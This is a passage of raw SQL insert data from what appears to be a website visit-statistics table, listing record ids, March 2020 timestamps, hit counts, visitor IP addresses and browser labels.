522,1583403633,1,1,0,0,'207.46.13.46','other'),(486523,1583403871,1,1,0,0,'157.55.39.164','other'),(486524,1583404664,1,1,0,0,'207.46.13.46','other'),(486525,1583404795,1,1,0,0,'91.209.11.30','chrome'),(486526,1583404845,1,1,0,0,'66.249.64.27','chrome'),(486527,1583405101,1,1,0,0,'178.154.171.134','other'),(486528,1583405921,1,1,0,0,'66.249.64.26','chrome'),(486529,1583406952,1,1,0,0,'66.249.70.62','chrome'),(486530,1583407143,1,1,0,0,'66.249.70.36','chrome'),(486531,1583407163,2,2,0,0,'178.154.171.134','other'),(486532,1583408094,1,1,0,0,'51.68.152.26','chrome'),(486533,1583408116,1,1,0,0,'157.55.39.164','other'),(486534,1583408423,1,1,0,0,'178.154.171.134','other'),(486535,1583408635,1,1,0,0,'207.46.13.46','other'),(486536,1583409179,1,1,0,0,'8.29.198.25','other'),(486537,1583409524,1,1,0,0,'66.249.64.27','chrome'),(486538,1583409939,1,1,0,0,'109.74.154.72','chrome'),(486539,1583410015,1,1,0,0,'46.211.219.53','chrome'),(486540,1583410341,1,1,0,0,'91.196.178.187','chrome'),(486541,1583410640,1,1,0,0,'91.196.178.82','chrome'),(486542,1583410642,1,1,0,0,'66.249.70.50','chrome'),(486543,1583410738,1,1,0,0,'176.102.32.227','chrome'),(486544,1583412186,1,1,0,0,'8.29.198.26','other'),(486545,1583412240,1,1,0,0,'66.249.70.46','chrome'),(486546,1583414997,1,1,0,0,'178.154.171.134','other'),(486547,1583415266,1,1,0,0,'13.66.139.0','other'),(486548,1583416123,1,1,0,0,'207.46.13.9','other'),(486549,1583416677,1,1,0,0,'176.9.154.47','other'),(486550,1583416682,1,1,0,0,'144.76.70.236','chrome'),(486551,1583418940,1,0,1,0,'66.249.64.28',''),(486552,1583419209,1,1,0,0,'91.196.178.173','chrome'),(486553,1583419426,2,2,0,0,'91.196.178.71','firefox'),(486554,1583419649,1,0,1,0,'207.46.13.65',''),(486555,1583420195,1,1,0,0,'66.249.64.27','chrome'),(486556,1583420654,1,1,0,0,'8.29.198.26','other'),(486557,1583421005,2,2,0,0,'207.46.13.9','other'),(486558,1583421405,1,1,0,0,'91.196.178.79','firefox'),(486559,1583421735,1,1,0,0,'213.180.203.186','other'),(486560,1583421768,1,1,0,0,'5.53.116.156','chrome'),(486561,1583421808,1,1,0,0,'66.249.64.26','chrome'),(486562,1583423507,1,1,0,0,'66.249.64.26','chrome'),(486563,1583423645,1,1,0,0,'8.29.198.25','other'),(486564,1583423918,1,1,0,0,'213.180.203.186','other'),(486565,1583425055,1,1,0,0,'94.153.107.200','chrome'),(486566,1583425074,2,2,0,0,'213.180.203.186','other'),(486567,1583425640,1,1,0,0,'207.46.13.9','other'),(486568,1583425794,1,1,0,0,'157.55.39.55','other'),(486569,1583428205,2,2,0,0,'213.180.203.186','other'),(486570,1583431093,1,1,0,0,'213.180.203.186','other'),(486571,1583431478,1,1,0,0,'207.46.13.54','other'),(486572,1583431901,1,1,0,0,'8.29.198.26','other'),(486573,1583432577,2,2,0,0,'213.180.203.186','other'),(486574,1583435176,1,1,0,0,'8.29.198.27','other'),(486575,1583435336,1,0,1,0,'157.55.39.252',''),(486576,1583435670,1,1,0,0,'66.249.64.27','chrome'),(486577,1583436136,1,1,0,0,'37.9.113.163','other'),(486578,1583436240,1,1,0,0,'213.180.203.186','other'),(486579,1583438317,2,2,0,0,'213.180.203.186','other'),(486580,1583440390,1,1,0,0,'213.180.203.186','other'),(486581,1583440819,1,1,0,0,'207.46.13.54','other'),(486582,1583440917,1,1,0,0,'66.249.64.26','chrome'),(486583,1583440949,1,1,0,0,'91.196.178.138','firefox'),(486584,1583441665,2,2,0,0,'37.73.157.174','chrome'),(486585,1583441764,1,1,0,0,'207.46.13.9','other'),(486586,1583442368,1,1,0,0,'5.45.207.49','other'),(486587,1583442369,1,1,0,0,'141.8.183.100','other'),(486588,1583442861,1,1,0,0,'207.46.13.54','other'),(486589,1583443441,1,1,0,0,'8.29.198.26','other'),(486590,1583445646,1,1,0,0,'213.180.203.186','other'),(486591,1583446417,1,1,0,0,'8.29.198.25','other'),(486592,1583446699,1,1,0,0,'95.108.213.55','other'),(486593,1583447823,1,1,0,0,'141.8.188.12','other'),(486594,1583447844,1,1,0,0,'141.8.132.12','other'),(486595,1583448214,1,1,0,0,'66.249.64.28','chrome'),(486596,1583450281,1,1,0,0,'141.8.142.115','other'),(486597,1583454634,1,1,0,0,'8.29.198.27','other'),(486598,1583455596,1,1,0,0,'207.46.13.83','other'),(486599,1583455851,1,1,0,0,'207.46.13.245','other'),(486600,1583456113,1,1,0,0,'62.205.134.182','other'),(486601,1583456153,1,0,1,0,'207.46.13.54',''),(486602,1583456336,1,1,0,0,'66.249.64.27','chrome'),(486603,1583456430,2,2,0,0,'178.154.171.134','other'),(486604,1583456605,2,2,0,0,'144.168.162.250','chrome'),(486605,1583457331,1,1,0,0,'213.251.242.62','other'),(486606,1583457652,1,1,0,0,'8.29.198.27','other'),(486607,1583458301,1,1,0,0,'107.23.162.31','chrome'),(486608,1583458578,1,1,0,0,'141.8.183.53','other'),(486609,1583458797,1,1,0,0,'207.46.13.54','other'),(486610,1583459210,1,1,0,0,'178.154.171.134','other'),(486611,1583459612,1,1,0,0,'95.108.181.104','other'),(486612,1583459868,1,1,0,0,'141.8.183.111','other'),(486613,1583460235,1,1,0,0,'141.8.183.33','other'),(486614,1583461704,1,1,0,0,'141.8.142.50','other'),(486615,1583463074,2,2,0,0,'95.91.42.2','other'),(486616,1583463098,1,1,0,0,'207.46.13.245','other'),(486617,1583463224,1,1,0,0,'178.154.171.134','other'),(486618,1583463808,1,1,0,0,'207.46.13.83','other'),(486619,1583464384,1,1,0,0,'178.154.171.127','other'),(486620,1583465711,1,1,0,0,'91.196.178.83','chrome'),(486621,1583465970,1,1,0,0,'8.29.198.26','other'),(486622,1583466636,1,1,0,0,'207.46.13.83','other'),(486623,1583467897,1,1,0,0,'5.45.207.65','other'),(486624,1583468286,1,1,0,0,'5.53.124.40','other'),(486625,1583468906,1,1,0,0,'8.29.198.25','other'),(486626,1583469943,1,1,0,0,'62.149.15.172','chrome'),(486627,1583470051,2,2,0,0,'178.154.171.134','other'),(486628,1583471617,1,1,0,0,'178.154.171.134','other'),(486629,1583472775,1,0,1,0,'207.46.13.54',''),(486630,1583473460,1,1,0,0,'62.205.134.182','other'),(486631,1583473687,1,1,0,0,'66.249.70.33','chrome'),(486632,1583473738,1,1,0,0,'66.249.70.62','chrome'),(486633,1583473746,1,0,1,0,'207.46.13.54',''),(486634,1583474265,1,1,0,0,'178.154.171.134','other'),(486635,1583475238,1,1,0,0,'178.154.171.134','other'),(486636,1583475353,1,1,0,0,'207.46.13.252','other'),(486637,1583477282,1,1,0,0,'31.13.127.6','other'),(486638,1583477283,1,1,0,0,'31.13.127.13','other'),(486639,1583477284,1,1,0,0,'31.13.127.16','other'),(486640,1583477398,1,1,0,0,'8.29.198.26','other'),(486641,1583477604,1,1,0,0,'91.196.178.186','chrome'),(486642,1583477791,2,2,0,0,'207.46.13.252','other'),(486643,1583478232,1,1,0,0,'91.196.177.46','chrome'),(486644,1583479007,1,1,0,0,'178.154.171.134','other'),(486645,1583479403,1,1,0,0,'91.196.178.74','chrome'),(486646,1583479410,1,1,0,0,'207.46.13.252','other'),(486647,1583479715,1,1,0,0,'178.154.171.127','other'),(486648,1583479845,1,1,0,0,'95.91.241.37','firefox'),(486649,1583480085,1,1,0,0,'8.29.198.26','other'),(486650,1583480366,1,1,0,0,'66.249.64.28','chrome'),(486651,1583480376,4,4,0,0,'95.134.189.48','chrome'),(486652,1583480813,1,1,0,0,'66.249.64.27','chrome'),(486653,1583480816,1,1,0,0,'66.249.64.26','chrome'),(486654,1583481070,1,1,0,0,'66.249.70.36','chrome'),(486655,1583482155,2,2,0,0,'207.46.13.252','other'),(486656,1583482684,1,1,0,0,'66.249.70.36','chrome'),(486657,1583483045,2,1,1,0,'66.249.64.28',''),(486658,1583483817,1,1,0,0,'66.249.64.27','chrome'),(486659,1583484093,1,1,0,0,'66.249.64.26','chrome'),(486660,1583484657,1,1,0,0,'91.196.178.186','chrome'),(486661,1583484973,2,2,0,0,'178.154.171.134','other'),(486662,1583485232,1,1,0,0,'178.154.171.127','other'),(486663,1583485246,2,2,0,0,'207.46.13.252','other'),(486664,1583485849,1,1,0,0,'94.153.102.80','chrome'),(486665,1583485891,1,1,0,0,'87.250.224.90','other'),(486666,1583486119,1,1,0,0,'178.154.171.134','other'),(486667,1583486390,1,1,0,0,'77.74.177.114','chrome'),(486668,1583486712,1,1,0,0,'178.154.171.127','other'),(486669,1583486769,2,2,0,0,'207.46.13.252','other'),(486670,1583486802,1,1,0,0,'34.229.131.17','chrome'),(486671,1583487226,1,1,0,0,'91.196.178.74','chrome'),(486672,1583487369,1,1,0,0,'178.154.171.134','other'),(486673,1583487527,1,1,0,0,'91.196.178.186','chrome'),(486674,1583487565,1,1,0,0,'178.92.218.32','firefox'),(486675,1583487577,1,1,0,0,'37.9.113.10','other'),(486676,1583487663,1,1,0,0,'91.196.178.92','chrome'),(486677,1583487908,1,1,0,0,'207.46.13.252','other'),(486678,1583488881,1,1,0,0,'178.154.171.127','other'),(486679,1583488931,1,1,0,0,'8.29.198.25','other'),(486680,1583489188,1,1,0,0,'178.92.218.32','firefox'),(486681,1583489479,1,1,0,0,'91.196.178.92','chrome'),(486682,1583489865,1,1,0,0,'178.154.171.134','other'),(486683,1583491252,1,1,0,0,'8.29.198.27','other'),(486684,1583491995,1,1,0,0,'46.211.218.230','chrome'),(486685,1583494753,1,0,1,0,'207.46.13.252',''),(486686,1583495040,1,1,0,0,'109.74.154.72','chrome'),(486687,1583496064,1,1,0,0,'218.210.98.136','firefox'),(486688,1583496703,1,1,0,0,'91.196.179.25','firefox'),(486689,1583497380,1,1,0,0,'207.46.13.252','other'),(486690,1583498125,1,1,0,0,'91.196.178.175','chrome'),(486691,1583498678,2,2,0,0,'178.154.171.134','other'),(486692,1583498759,1,1,0,0,'66.249.64.28','chrome'),(486693,1583499244,1,1,0,0,'31.13.127.4','other'),(486694,1583499245,3,3,0,0,'31.13.127.2','other'),(486695,1583499247,2,2,0,0,'31.13.127.14','other'),(486697,1583499799,1,1,0,0,'178.154.171.134','other'),(486698,1583500098,2,2,0,0,'207.46.13.252','other'),(486699,1583500288,1,1,0,0,'8.29.198.26','other'),(486700,1583502411,1,1,0,0,'207.46.13.181','other'),(486701,1583502412,1,1,0,0,'8.29.198.25','other'),(486702,1583503650,1,0,1,0,'207.46.13.181',''),(486703,1583503920,1,1,0,0,'178.154.171.134','other'),(486704,1583505184,1,1,0,0,'207.46.13.181','other'),(486705,1583505937,1,1,0,0,'66.249.70.44','chrome'),(486706,1583506256,1,1,0,0,'66.249.64.26','chrome'),(486707,1583506482,1,1,0,0,'207.46.13.181','other'),(486708,1583506686,1,1,0,0,'178.154.171.127','other'),(486709,1583507922,2,2,0,0,'207.46.13.181','other'),(486710,1583508719,1,1,0,0,'213.180.203.186','other'),(486711,1583509875,1,1,0,0,'66.249.64.27','chrome'),(486712,1583510025,1,1,0,0,'66.249.70.36','chrome'),(486713,1583511750,1,1,0,0,'8.29.198.26','other'),(486714,1583511974,1,0,1,0,'66.249.64.26',''),(486715,1583512152,1,1,0,0,'178.154.171.134','other'),(486716,1583512812,1,1,0,0,'91.196.178.83','chrome'),(486717,1583513683,1,1,0,0,'8.29.198.25','other'),(486718,1583514484,2,2,0,0,'178.154.171.134','other'),(486719,1583515170,1,1,0,0,'207.46.13.181','other'),(486720,1583515251,1,1,0,0,'66.249.64.27','chrome'),(486721,1583515509,1,1,0,0,'66.249.64.26','chrome'),(486722,1583515977,1,1,0,0,'66.249.70.36','chrome'),(486723,1583516287,1,1,0,0,'213.180.203.186','other'),(486724,1583516412,1,1,0,0,'207.46.13.181','other'),(486725,1583516422,1,1,0,0,'66.249.70.33','chrome'),(486726,1583517186,1,1,0,0,'46.201.112.128','chrome'),(486727,1583517215,1,1,0,0,'207.46.13.249','other'),(486728,1583517359,1,1,0,0,'207.46.13.181','other'),(486729,1583517634,1,1,0,0,'66.249.70.62','chrome'),(486730,1583517758,1,1,0,0,'66.249.64.27','chrome'),(486731,1583517873,1,1,0,0,'66.249.70.33','chrome'),(486732,1583518298,1,1,0,0,'207.46.13.249','other'),(486733,1583518720,1,0,1,0,'66.249.70.62',''),(486734,1583519703,2,2,0,0,'207.46.13.249','other'),(486735,1583519868,1,1,0,0,'66.249.64.27','chrome'),(486736,1583520485,1,1,0,0,'141.8.142.2','other'),(486737,1583520721,1,1,0,0,'178.154.171.134','other'),(486738,1583521414,1,1,0,0,'87.250.224.90','other'),(486739,1583521474,1,1,0,0,'66.249.70.62','chrome'),(486740,1583521796,2,2,0,0,'178.154.171.134','other'),(486741,1583522876,1,1,0,0,'66.249.64.27','chrome'),(486742,1583523093,2,2,0,0,'207.46.13.181','other'),(486743,1583523102,1,0,1,0,'66.249.64.28',''),(486744,1583523298,1,1,0,0,'66.249.64.26','chrome'),(486745,1583523786,1,1,0,0,'207.46.13.249','other'),(486746,1583523844,1,1,0,0,'8.29.198.27','other'),(486747,1583523936,1,1,0,0,'178.154.171.127','other'),(486748,1583524666,1,1,0,0,'66.249.64.27','chrome'),(486749,1583525171,1,1,0,0,'8.29.198.27','other'),(486750,1583525935,4,4,0,0,'207.46.13.181','other'),(486751,1583525945,5,5,0,0,'207.46.13.249','other'),(486752,1583526067,1,1,0,0,'93.124.15.87','chrome'),(486753,1583526363,1,1,0,0,'178.154.171.127','other'),(486754,1583527076,1,0,1,0,'207.46.13.181',''),(486755,1583527138,1,1,0,0,'207.46.13.181','other'),(486756,1583527485,1,1,0,0,'178.154.171.134','other'),(486757,1583527743,1,1,0,0,'91.196.178.82','firefox'),(486758,1583528872,1,1,0,0,'66.249.64.27','chrome'),(486759,1583529659,1,1,0,0,'176.57.69.61','chrome'),(486760,1583530061,1,1,0,0,'207.46.13.249','other'),(486761,1583530233,1,1,0,0,'207.46.13.181','other'),(486762,1583531246,1,1,0,0,'207.46.13.249','other'),(486763,1583531711,1,1,0,0,'66.249.64.28','chrome'),(486764,1583532665,1,1,0,0,'176.193.5.207','firefox'),(486765,1583533030,2,2,0,0,'207.46.13.181','other'),(486766,1583533478,2,2,0,0,'178.154.171.134','other'),(486767,1583534149,2,2,0,0,'207.46.13.181','other'),(486768,1583534710,1,1,0,0,'178.154.171.134','other'),(486769,1583534753,1,1,0,0,'207.46.13.206','other'),(486770,1583534869,1,0,1,0,'207.46.13.249',''),(486771,1583535095,1,1,0,0,'66.249.64.28','chrome'),(486772,1583535234,1,1,0,0,'8.29.198.26','other'),(486773,1583536322,1,1,0,0,'8.29.198.26','other'),(486774,1583536697,1,1,0,0,'35.228.225.82','other'),(486775,1583536864,1,1,0,0,'178.154.171.134','other'),(486776,1583537860,1,1,0,0,'178.154.171.127','other'),(486777,1583538389,1,1,0,0,'178.154.171.134','other'),(486778,1583539568,1,1,0,0,'157.55.39.192','other'),(486779,1583540279,1,1,0,0,'66.249.70.36','chrome'),(486780,1583541595,1,1,0,0,'66.249.64.28','chrome'),(486781,1583541786,1,1,0,0,'66.249.70.62','chrome'),(486782,1583542001,1,1,0,0,'207.46.13.206','other'),(486783,1583542513,1,1,0,0,'62.205.134.182','other'),(486784,1583542952,1,1,0,0,'66.249.64.27','chrome'),(486785,1583543041,1,1,0,0,'178.154.171.134','other'),(486786,1583544126,1,1,0,0,'66.249.70.33','chrome'),(486787,1583544582,2,2,0,0,'66.249.64.27','chrome'),(486788,1583545094,2,2,0,0,'207.46.13.181','other'),(486789,1583545108,1,1,0,0,'66.249.69.62','chrome'),(486790,1583545967,1,1,0,0,'2.47.39.219','other'),(486791,1583546074,1,1,0,0,'157.55.39.192','other'),(486792,1583546435,1,1,0,0,'8.29.198.25','other'),(486793,1583546566,1,1,0,0,'66.249.64.26','chrome'),(486794,1583546588,1,1,0,0,'207.46.13.181','other'),(486795,1583547442,1,1,0,0,'8.29.198.25','other'),(486796,1583547671,2,2,0,0,'66.249.64.27','chrome'),(486797,1583547723,1,1,0,0,'64.246.178.34','firefox'),(486798,1583547745,1,1,0,0,'95.108.213.55','other'),(486799,1583548018,1,1,0,0,'66.249.64.26','chrome'),(486800,1583548978,1,1,0,0,'37.9.113.177','other'),(486801,1583549934,4,4,0,0,'178.154.171.127','other'),(486802,1583550228,1,1,0,0,'66.249.70.62','chrome'),(486803,1583550233,1,1,0,0,'66.249.64.27','chrome'),(486804,1583550396,1,1,0,0,'207.46.13.249','other'),(486805,1583550840,1,1,0,0,'66.249.64.26','chrome'),(486806,1583551500,1,1,0,0,'66.249.70.36','chrome'),(486807,1583551626,1,1,0,0,'91.196.178.41','chrome'),(486808,1583552274,1,1,0,0,'157.55.39.192','other'),(486809,1583552563,1,1,0,0,'37.9.113.10','other'),(486810,1583552705,1,1,0,0,'66.249.64.28','chrome'),(486811,1583553595,2,2,0,0,'66.249.64.26','chrome'),(486812,1583553678,1,1,0,0,'66.249.70.33','chrome'),(486813,1583554853,1,1,0,0,'66.249.64.28','chrome'),(486814,1583555440,1,1,0,0,'62.149.15.172','chrome'),(486815,1583555689,2,2,0,0,'66.249.64.27','chrome'),(486816,1583556097,1,1,0,0,'66.249.64.28','chrome'),(486817,1583556326,2,2,0,0,'66.249.64.26','chrome'),(486818,1583556597,1,1,0,0,'207.46.13.181','other'),(486819,1583556752,2,2,0,0,'178.154.171.134','other'),(486820,1583556958,1,1,0,0,'207.46.13.249','other'),(486821,1583557585,1,1,0,0,'66.249.64.27','chrome'),(486822,1583557597,2,2,0,0,'8.29.198.27','other'),(486823,1583558557,1,1,0,0,'66.249.64.26','chrome'),(486824,1583558757,1,1,0,0,'178.154.171.127','other'),(486825,1583558818,1,1,0,0,'91.196.178.66','chrome'),(486826,1583559725,1,1,0,0,'62.205.134.182','other'),(486827,1583560083,1,1,0,0,'207.46.13.249','other'),(486828,1583560129,2,2,0,0,'66.249.64.27','chrome'),(486829,1583561290,1,1,0,0,'66.249.64.26','chrome'),(486830,1583562817,1,1,0,0,'66.249.64.26','chrome'),(486831,1583564047,1,1,0,0,'66.249.64.27','chrome'),(486832,1583564436,1,1,0,0,'66.249.70.33','chrome'),(486833,1583565043,2,2,0,0,'66.249.64.28','chrome'),(486834,1583565526,1,1,0,0,'66.249.64.26','chrome'),(486835,1583566655,1,1,0,0,'66.249.64.28','chrome'),(486836,1583566744,2,2,0,0,'66.249.64.27','chrome'),(486837,1583566872,2,2,0,0,'66.249.64.26','chrome'),(486838,1583567426,3,3,0,0,'66.249.70.62','chrome'),(486839,1583567529,1,1,0,0,'66.249.70.36','chrome'),(486840,1583567858,2,2,0,0,'66.249.64.28','chrome'),(486841,1583567979,1,1,0,0,'207.46.13.181','other'),(486842,1583568753,2,2,0,0,'8.29.198.26','other'),(486843,1583568900,1,1,0,0,'66.249.70.33','chrome'),(486844,1583569486,1,1,0,0,'66.249.64.26','chrome'),(486845,1583569637,3,3,0,0,'66.249.64.28','chrome'),(486846,1583569646,2,2,0,0,'66.249.64.27','chrome'),(486847,1583570971,1,1,0,0,'207.46.13.181','other'),(486848,1583571605,1,1,0,0,'207.46.13.249','other'),(486849,1583571944,1,1,0,0,'157.55.39.192','other'),(486850,1583571948,3,3,0,0,'207.46.13.181','other'),(486851,1583572049,1,1,0,0,'109.120.151.127','firefox'),(486852,1583573127,1,1,0,0,'116.203.114.128','other'),(486853,1583573431,2,2,0,0,'66.249.64.28','chrome'),(486854,1583573473,1,1,0,0,'207.46.13.249','other'),(486855,1583573666,2,2,0,0,'66.249.64.26','chrome'),(486856,1583574045,1,1,0,0,'178.154.171.127','other'),(486857,1583574095,1,1,0,0,'66.249.64.27','chrome'),(486858,1583574372,2,2,0,0,'207.46.13.181','other'),(486859,1583574442,1,1,0,0,'116.203.114.128','other'),(486860,1583574766,2,2,0,0,'178.154.171.134','other'),(486861,1583575110,1,1,0,0,'138.246.253.15','chrome'),(486862,1583576318,1,1,0,0,'66.249.64.26','chrome'),(486863,1583576781,1,1,0,0,'66.249.64.28','chrome'),(486864,1583577145,1,1,0,0,'207.46.13.249','other'),(486865,1583577256,3,2,1,0,'66.249.64.27',''),(486866,1583578560,2,2,0,0,'178.154.171.127','other'),(486867,1583578600,1,1,0,0,'188.146.34.119','other'),(486868,1583578875,1,0,1,0,'157.55.39.192',''),(486869,1583578916,1,1,0,0,'66.249.64.26','chrome'),(486870,1583579841,1,1,0,0,'8.29.198.25','other'),(486871,1583579980,2,2,0,0,'66.249.64.26','chrome'),(486872,1583580374,1,1,0,0,'8.29.198.27','other'),(486873,1583580837,3,3,0,0,'66.249.64.28','chrome'),(486874,1583580852,2,2,0,0,'66.249.64.27','chrome'),(486875,1583580912,1,1,0,0,'109.74.154.72','chrome'),(486876,1583581644,2,2,0,0,'178.154.171.134','other'),(486877,1583582337,1,1,0,0,'66.249.64.26','chrome'),(486878,1583582372,5,5,0,0,'66.249.64.27','chrome'),(486879,1583582447,2,2,0,0,'66.249.64.28','chrome'),(486880,1583582582,1,1,0,0,'141.8.142.2','other'),(486881,1583582650,2,2,0,0,'178.154.171.127','other'),(486882,1583582841,1,1,0,0,'207.46.13.181','other'),(486883,1583583325,2,2,0,0,'66.249.64.27','chrome'),(486884,1583583682,1,1,0,0,'157.55.39.192','other'),(486885,1583583795,3,3,0,0,'66.249.64.26','chrome'),(486886,1583584347,2,2,0,0,'66.249.64.28','chrome'),(486887,1583584544,2,2,0,0,'66.249.70.36','chrome'),(486888,1583584872,1,1,0,0,'66.249.64.26','chrome'),(486889,1583584882,1,1,0,0,'66.249.64.27','chrome'),(486890,1583585055,1,1,0,0,'93.190.138.231','chrome'),(486891,1583585602,1,1,0,0,'31.13.127.24','other'),(486892,1583585603,1,1,0,0,'31.13.127.23','other'),(486893,1583585605,1,1,0,0,'31.13.127.6','other'),(486894,1583585835,1,0,1,0,'207.46.13.249',''),(486895,1583586263,1,1,0,0,'207.46.13.249','other'),(486896,1583586353,1,1,0,0,'66.249.64.28','chrome'),(486897,1583586659,1,1,0,0,'66.249.64.26','chrome'),(486898,1583586900,1,1,0,0,'207.46.13.181','other'),(486899,1583587075,1,1,0,0,'178.154.171.134','other'),(486900,1583587238,1,1,0,0,'66.249.64.27','chrome'),(486901,1583587578,3,3,0,0,'66.249.64.26','chrome'),(486902,1583588388,1,1,0,0,'66.249.64.28','chrome'),(486903,1583588676,1,1,0,0,'207.46.13.181','other'),(486904,1583589008,2,2,0,0,'207.46.13.249','other'),(486905,1583589131,1,1,0,0,'157.55.39.192','other'),(486906,1583589267,1,1,0,0,'178.154.171.127','other'),(486907,1583589395,2,2,0,0,'66.249.64.27','chrome'),(486908,1583589431,3,3,0,0,'66.249.64.26','chrome'),(486909,1583589560,1,1,0,0,'66.249.64.28','chrome'),(486910,1583589698,2,2,0,0,'31.13.115.13','other'),(486911,1583589700,1,1,0,0,'31.13.115.7','other'),(486912,1583589701,1,1,0,0,'31.13.115.10','other'),(486913,1583589752,2,2,0,0,'31.13.115.1','other'),(486914,1583590112,1,1,0,0,'207.46.13.181','other'),(486915,1583590362,1,1,0,0,'209.17.97.90','other'),(486916,1583590615,1,1,0,0,'209.17.97.10','other'),(486917,1583590639,1,1,0,0,'128.124.1.139','chrome'),(486918,1583590741,1,1,0,0,'178.154.171.134','other'),(486919,1583590944,2,2,0,0,'8.29.198.27','other'),(486920,1583591105,2,2,0,0,'66.249.64.27','chrome'),(486921,1583591120,1,1,0,0,'37.9.113.10','other'),(486922,1583591341,1,1,0,0,'66.249.70.36','chrome'),(486923,1583591344,2,2,0,0,'66.249.64.28','chrome'),(486924,1583591694,1,1,0,0,'66.249.70.62','chrome'),(486925,1583592081,2,2,0,0,'207.46.13.181','other'),(486926,1583592168,1,1,0,0,'5.253.206.140','msie'),(486927,1583592354,1,1,0,0,'157.55.39.192','other'),(486928,1583592739,2,2,0,0,'178.154.171.134','other'),(486929,1583592785,1,1,0,0,'94.178.6.207','chrome'),(486930,1583592801,2,2,0,0,'66.249.64.27','chrome'),(486931,1583592850,1,1,0,0,'66.249.70.62','chrome'),(486932,1583593655,1,1,0,0,'66.249.64.28','chrome'),(486933,1583593919,1,1,0,0,'91.196.178.161','chrome'),(486934,1583593933,1,1,0,0,'66.249.64.27','chrome'),(486935,1583594147,2,2,0,0,'66.249.64.26','chrome'),(486936,1583594836,1,1,0,0,'66.249.64.28','chrome'),(486937,1583594931,1,1,0,0,'207.46.13.181','other'),(486938,1583595232,1,1,0,0,'207.46.13.249','other'),(486939,1583595522,2,2,0,0,'66.249.64.26','chrome'),(486940,1583595682,2,2,0,0,'66.249.64.27','chrome'),(486941,1583596172,1,1,0,0,'157.55.39.192','other'),(486942,1583596182,2,2,0,0,'66.249.64.28','chrome'),(486943,1583596328,1,1,0,0,'207.46.13.181','other'),(486944,1583596536,2,2,0,0,'66.249.64.26','chrome'),(486945,1583596999,1,1,0,0,'178.154.171.127','other'),(486946,1583597146,2,2,0,0,'66.249.64.28','chrome'),(486947,1583597421,1,1,0,0,'91.196.178.89','firefox'),(486948,1583598003,3,3,0,0,'66.249.70.36','chrome'),(486949,1583598067,3,3,0,0,'66.249.64.27','chrome'),(486950,1583598371,1,1,0,0,'66.249.70.62','chrome'),(486951,1583599120,1,1,0,0,'66.249.64.27','chrome'),(486952,1583600010,2,2,0,0,'66.249.64.28','chrome'),(486953,1583600142,2,2,0,0,'66.249.64.27','chrome'),(486954,1583600371,4,4,0,0,'66.249.64.26','chrome'),(486955,1583600618,1,1,0,0,'178.154.171.127','other'),(486956,1583600974,1,1,0,0,'95.108.181.104','other'),(486957,1583601034,1,1,0,0,'207.46.13.249','other'),(486958,1583601786,1,0,1,0,'157.55.39.192',''),(486959,1583601870,1,1,0,0,'66.249.70.62','chrome'),(486960,1583601909,3,2,1,0,'66.249.64.26',''),(486961,1583602002,1,1,0,0,'8.29.198.27','other'),(486962,1583602110,4,4,0,0,'66.249.64.26','chrome'),(486963,1583602225,1,1,0,0,'8.29.198.25','other'),(486964,1583602328,1,1,0,0,'207.46.13.249','other'),(486965,1583602709,4,4,0,0,'178.154.171.134','other'),(486966,1583602745,1,1,0,0,'66.249.70.33','chrome'),(486967,1583603070,2,2,0,0,'66.249.64.28','chrome'),(486968,1583603537,1,1,0,0,'66.249.70.62','chrome'),(486969,1583603955,2,2,0,0,'66.249.70.33','chrome'),(486970,1583604268,2,2,0,0,'157.55.39.192','other'),(486971,1583604766,2,2,0,0,'66.249.64.26','chrome'),(486972,1583604909,2,2,0,0,'207.46.13.249','other'),(486973,1583604960,2,2,0,0,'178.154.171.134','other'),(486974,1583605100,1,1,0,0,'91.196.178.142','chrome'),(486975,1583605586,1,1,0,0,'66.249.70.33','chrome'),(486976,1583605898,1,1,0,0,'66.249.64.27','chrome'),(486977,1583606265,1,1,0,0,'66.249.64.28','chrome'),(486978,1583606367,2,2,0,0,'157.55.39.192','other'),(486979,1583606415,2,2,0,0,'66.249.64.26','chrome'),(486980,1583606573,1,1,0,0,'207.46.13.181','other'),(486981,1583606954,1,1,0,0,'66.249.64.27','chrome'),(486982,1583607279,2,2,0,0,'66.249.64.28','chrome'),(486983,1583607596,1,1,0,0,'207.46.13.249','other'),(486984,1583607690,2,2,0,0,'66.249.70.62','chrome'),(486985,1583607697,5,5,0,0,'66.249.64.26','chrome'),(486986,1583607961,5,5,0,0,'66.249.64.27','chrome'),(486987,1583608818,1,1,0,0,'66.249.64.26','chrome'),(486988,1583608882,1,1,0,0,'66.249.64.27','chrome'),(486989,1583608899,1,1,0,0,'157.55.39.192','other'),(486990,1583608986,1,1,0,0,'207.46.13.181','other'),(486991,1583609078,2,2,0,0,'66.249.70.36','chrome'),(486992,1583609093,1,1,0,0,'207.46.13.249','other'),(486993,1583609785,2,2,0,0,'66.249.64.28','chrome'),(486994,1583610480,1,1,0,0,'157.55.39.192','other'),(486995,1583610857,3,3,0,0,'66.249.64.27','chrome'),(486996,1583611199,2,2,0,0,'66.249.64.26','chrome'),(486997,1583611592,1,1,0,0,'157.55.39.192','other'),(486998,1583611799,2,2,0,0,'66.249.64.28','chrome'),(486999,1583612468,1,1,0,0,'178.154.171.127','other'),(487000,1583612736,2,2,0,0,'66.249.64.26','chrome'),(487001,1583613000,2,2,0,0,'8.29.198.26','other'),(487002,1583613370,2,2,0,0,'66.249.64.28','chrome'),(487003,1583613406,3,3,0,0,'157.55.39.186','other'),(487004,1583614020,2,2,0,0,'66.249.64.26','chrome'),(487005,1583614627,1,1,0,0,'66.249.64.28','chrome'),(487006,1583614628,1,1,0,0,'82.145.208.230','other'),(487007,1583614759,1,1,0,0,'207.46.13.181','other'),(487008,1583614802,1,1,0,0,'66.249.64.27','chrome'),(487009,1583615670,1,1,0,0,'178.154.171.134','other'),(487010,1583615698,1,1,0,0,'66.249.64.26','chrome'),(487011,1583615815,2,2,0,0,'207.46.13.181','other'),(487012,1583616180,1,1,0,0,'66.249.64.27','chrome'),(487013,1583616937,1,1,0,0,'66.249.70.36','chrome'),(487014,1583616949,2,1,1,0,'207.46.13.181',''),(487015,1583617020,3,3,0,0,'66.249.64.26','chrome'),(487016,1583617154,1,1,0,0,'66.249.64.28','chrome'),(487017,1583617208,1,1,0,0,'141.8.142.2','other'),(487018,1583618072,1,1,0,0,'66.249.70.62','chrome'),(487019,1583618277,1,1,0,0,'178.154.171.134','other'),(487020,1583618284,2,2,0,0,'157.55.39.192','other'),(487021,1583618365,1,1,0,0,'141.8.142.2','other'),(487022,1583618699,1,1,0,0,'207.46.13.181','other'),(487023,1583618739,1,1,0,0,'46.211.232.181','chrome'),(487024,1583618889,2,2,0,0,'66.249.64.26','chrome'),(487025,1583619203,1,1,